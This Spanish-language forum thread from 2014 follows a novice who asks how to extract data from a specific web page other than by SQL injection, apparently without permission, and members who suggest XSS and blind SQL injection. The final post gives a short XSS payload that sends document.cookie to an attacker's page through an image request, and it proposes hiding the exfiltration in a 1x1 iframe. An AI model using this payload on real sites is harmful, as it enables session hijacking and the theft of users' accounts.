[SOLUCIONADO] Como obtener tablas de datos de una pagina web?

diego1399 · Marzo 09, 2014, 04:00:21 PM

Hola soy muy nuevo en el tema de seguridad informatica,y queria saber que metodo puedo usar que no sea sql injection,ya que ese metodo para esa pagina no sirve,hay algun otro metodo?Me podrian decir cual es asi solo busco y leo!

rollth · Marzo 09, 2014, 04:12:12 PM

la verdad es que todas las paginas estan programadas con html, css y javascript xD, la cosa es que hay muchas formas y cada pagina tiene sus errores.
Yo tampoco soy muy experto pero podrias buscar sobre inyecciones xss, blind sql(me suena que se llamaba asi) o (yo no lo se usar) con kali o backtrack.
Para hacer una inyeccion sql tambien tiene que tener una base de datos.
Si me equivoco en algo que me corrijan los que saben xD.

diego1399 · Marzo 09, 2014, 04:18:41 PM

Gracias no tenia idea de donde empezar,buscare eso,no se,pense que tal vez algunas pagina programadas en "x" lenguajes podrian ser mas vulnerables,disculpa.

rollth · Marzo 09, 2014, 04:46:19 PM

Estamos para ayudar, te paso este link que parece esta interesante No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Siento no poder ayudarte mas pero mis conocimientos son muy limitados

.:UND3R:. · Marzo 09, 2014, 07:11:29 PM

html, css y Javascript, son lenguajes de programación a nivel web ejecutado en el cliente, es decir no pueden ser vulnerados o explotados. PHP, ASP, etc. son ejecutados en el servidor, por lo cual podrían ser vulnerados, una página simple sin base de datos ni programación a nivel de servidor no creo que puedan ser comprometidos, debido a su simple composición. Es decir olvídate den análisis de fallos de seguridad a nivel web, alternativamente puedes hacer un análisis a nivel de servidor, saludos y suerte.

rollth · Marzo 09, 2014, 07:34:38 PM

javascript se puede utilizar para sacar los cookies de sesion

Snifer · Marzo 09, 2014, 08:16:06 PM

Pero necesitas tener un vector de ataque muy bien armado y demas trajes asi que de que funcione a un simple document.cookie

olvidalo, a no ser que sea la peor de la peor la web.

Regards,
Snifer

.:UND3R:. · Marzo 09, 2014, 09:17:01 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
javascript se puede utilizar para sacar los cookies de sesion

efectivamente, siempre cuando puedas inyectar un XSS el cual es generado por lenguajes ejecutados a nivel de servidor.

rollth · Marzo 10, 2014, 08:19:14 AM

Ya que ha surgido el tema me preguntaba si en un fallo xss se podria introducir tambien codigo php para hacer que sacara los cookies y te los enviara al correo, para que asi sea mas facil

Snifer · Marzo 10, 2014, 05:50:46 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ya que ha surgido el tema me preguntaba si en un fallo xss se podria introducir tambien codigo php para hacer que sacara los cookies y te los enviara al correo, para que asi sea mas facil

Tu vector de ataque ya es mucho mas complejo!! xD pero adelante..

Regards,
Snfer

rollth · Marzo 10, 2014, 06:53:45 PM

jaja es que llevo poco tiempo xD, por cierto que es un vector de ataque? lo he visto en muchos post pero no se bien que es

Snifer · Marzo 11, 2014, 10:10:18 AM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
jaja es que llevo poco tiempo xD, por cierto que es un vector de ataque? lo he visto en muchos post pero no se bien que es

Lo que te ayudara es Google

Regards,
Snifer

.:UND3R:. · Marzo 12, 2014, 07:46:46 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Ya que ha surgido el tema me preguntaba si en un fallo xss se podria introducir tambien codigo php para hacer que sacara los cookies y te los enviara al correo, para que asi sea mas facil

Yo creo que lo que comentas es imposible, ya que estás mezclando niveles de programación, recuerda que XSS se ejecuta a nivel de clientes (navegador), por ello la compatibilidad de XSS, el cual XSS sofisticados y capaces de hacer bypass ha filtros son compatibles en algunos navegadores, el PHP es otro tema, lo que puedes hacer es inyectar código javascript (ejecutado por el navegador), una vez ejecutado que en este caso sería obtener la cookie de la web, se procedería a llamar a a una página (redireccionar) que apunte a un simple PHP capaz de almacenar una variable que reciba:

aquí un ejemplo extraido de internet:
<script>
new Image().src="No tienes permitido ver enlaces. Registrate o Entra a tu cuenta?cookie="+encodeURI(document.cookie);
</script>

La cookie sería enviada como parámetro.

Otra idea que saqué de un libro el cual encontré muy interesante que sería la solución al redireccionamiento, ya que se debe cargar la página del hacker con el parámetro, si hay una redirección sería muy sospechoso a mi gusto no es un ataque elegante, por lo cual en el libro se comentaba crear un iframe de 1x1, integrarlo al documento html y posteriormente enviar los parámetros a la url "maligna", ideas hay muchas pero hay que tener creatividad, saludos.

[SOLUCIONADO] Como obtener tablas de datos de una pagina web?

diego1399

Marzo 09, 2014, 04:00:21 PM Ultima modificación: Mayo 25, 2014, 04:10:27 PM por blackdrake

rollth

Marzo 09, 2014, 04:12:12 PM #1

diego1399

Marzo 09, 2014, 04:18:41 PM #2 Ultima modificación: Marzo 09, 2014, 08:14:59 PM por Snifer

rollth

Marzo 09, 2014, 04:46:19 PM #3

.:UND3R:.

Marzo 09, 2014, 07:11:29 PM #4

rollth

Marzo 09, 2014, 07:34:38 PM #5

Snifer

Marzo 09, 2014, 08:16:06 PM #6

.:UND3R:.

Marzo 09, 2014, 09:17:01 PM #7

rollth

Marzo 10, 2014, 08:19:14 AM #8

Snifer

Marzo 10, 2014, 05:50:46 PM #9

rollth

Marzo 10, 2014, 06:53:45 PM #10

Snifer

Marzo 11, 2014, 10:10:18 AM #11

.:UND3R:.

Marzo 12, 2014, 07:46:46 PM #12